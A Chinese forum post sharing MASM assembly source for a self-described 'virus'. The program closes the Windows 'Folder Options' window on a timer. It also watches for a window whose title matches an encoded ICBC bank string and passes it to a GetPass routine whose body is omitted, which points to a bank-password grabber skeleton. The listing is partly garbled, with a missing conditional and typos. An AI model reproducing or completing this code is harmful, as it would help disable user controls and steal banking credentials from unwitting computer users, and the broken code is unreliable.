| 查看: 366 | 回复: 0 | |||
| 当前主题已经存档。 | |||
sdlj8051金虫 (著名写手)
|
[交流]
讨论一个汇编写的"病毒"
|
||
|
;MASM 病毒:禁止打开文件夹选项,运行后请用任务管理器结束 .486 .model flat,stdcall option casemap:none ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; Include 数据 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> include windows.inc include kernel32.inc includelib kernel32.lib include user32.inc includelib user32.lib ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; Equ 数据 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; 数据段 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> .data sbar db "文件夹选项",0 sbar2 db 185,164,201,204,210,248,208,208,0 ;ICBC .data? slen dd ? fwin HINSTANCE ? hInstance HINSTANCE ? CommandLine LPSTR ? Timerid UINT ? lpString byte 127 dup(?) ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; 代码段 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> .code TimerProc PROC hWnd  WORD,uMsgWORD,wParamWORD,lParamWORDinvoke GetForegroundWindow ;取前台窗口句柄 mov fwin,eax invoke GetWindowText, fwin,addr lpString,100 ;取窗口标题 .if eax==0 ret .endif invoke lstrlen, offset lpString ;获得长度 mov slen,eax invoke CharUpperBuff,offset lpString,slen ;转为大写 invoke lstrcmp,addr lpString, addr sbar ;比较文本 invoke SendMessage,fwin,WM_CLOSE,NULL,NULL .endif invoke lstrcmp,addr lpString, addr sbar2 ;比较文本 .if eax==0 invoke GetPass,fwin .endif ret TimerProc endp ;************************************************************ whileStar PROC LOCAL @stMsg:MSG .while TRUE invoke GetMessage,addr @stMsg,NULL,0,0 .break .if (!eax) invoke TranslateMessage,addr @stMsg invoke DispatchMessage,addr @stMsg .endw ;...... ret whileStar endp GetPass PROC hwnd:drord ;...... GetPass endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; 程序开始 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> start: invoke GetModuleHandle,NULL mov hInstance,eax invoke GetCommandLine mov CommandLine,eax invoke SetTimer,NULL,NULL,100, addr TimerProc ;定时器:100ms mov Timerid,eax invoke whileStar ;进入消息循环,直到收到退出消息 invoke KillTimer,NULL,Timerid invoke ExitProcess,NULL ;******************************************************************** end start ================================= 实际上也不算病毒,网吧里可能用得着 如果加一个配置文件,就可以结束指定窗口名的程序 等等 [ Last edited by 幻影无痕 on 2006-10-17 at 10:19 ] |
回复此楼» 猜你喜欢
计算机、0854电子信息(085401-058412)调剂
已经有5人回复
-
国自然申请面上模板最新2026版出了吗?
已经有13人回复
-
基金委咋了?2026年的指南还没有出来?
已经有3人回复
-
Materials Today Chemistry审稿周期
已经有5人回复
-
溴的反应液脱色
已经有7人回复
-
推荐一本书
已经有12人回复
-
基金申报
已经有4人回复
-
纳米粒子粒径的测量
已经有7人回复
-
常年博士招收(双一流,工科)
已经有4人回复
-
有没有人能给点建议
已经有5人回复